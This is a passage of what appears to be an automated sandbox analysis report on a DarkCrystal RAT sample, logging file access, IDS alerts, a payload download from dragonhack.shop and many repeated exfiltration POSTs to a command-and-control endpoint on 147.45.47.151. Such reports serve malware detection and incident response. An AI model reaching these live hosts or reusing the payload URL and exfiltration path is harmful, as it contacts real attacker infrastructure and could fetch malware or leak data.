                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, File opened: C:\Users\user
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, File opened: C:\Users\user\AppData
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, File opened: C:\Users\user\AppData\Local\Temp
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, File opened: C:\Users\user\Desktop\desktop.ini
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, File opened: C:\Users\user\AppData\Local
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, File opened: C:\Users\user\Documents\desktop.ini

                                Networking

                                Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.8:49713 -> 147.45.47.151:80
                                Source: Network trafficSuricata IDS: 2048130 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST) : 192.168.2.8:49728 -> 147.45.47.151:80
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: global trafficTCP traffic: 192.168.2.8:49705 -> 147.45.44.151:5555
                                Source: global trafficHTTP traffic detected: GET /done.exe HTTP/1.1Host: dragonhack.shopConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Content-Type: application/jsonHost: ip-api.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                                Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
                                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                Source: unknownDNS query: name: ip-api.com
                                Source: global traffic | HTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: 147.45.47.151 | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
                                Source: global traffic | HTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----nCS53NPw2nKhZqltAC7D5xETwvhPigkYiE | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: 147.45.47.151 | Content-Length: 115942 | Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2504Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 1984Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 1992Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 1992Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2004Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 1984Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 1984Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2004Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2004Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 1992Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2004Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2004Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2504Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2500Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2004Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2504Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 1992Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2504Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2004Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2504Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 1980Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2004Expect: 100-continue
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.151
                                Source: global trafficHTTP traffic detected: GET /done.exe HTTP/1.1Host: dragonhack.shopConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Content-Type: application/jsonHost: ip-api.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                Source: global trafficDNS traffic detected: DNS query: ip-api.com
                                Source: global trafficDNS traffic detected: DNS query: dragonhack.shop
                                Source: unknownHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                Source: powershell.exe, 0000001F.00000002.3012073469.000001CA2FDE3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.3049977867.0000015FC586B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
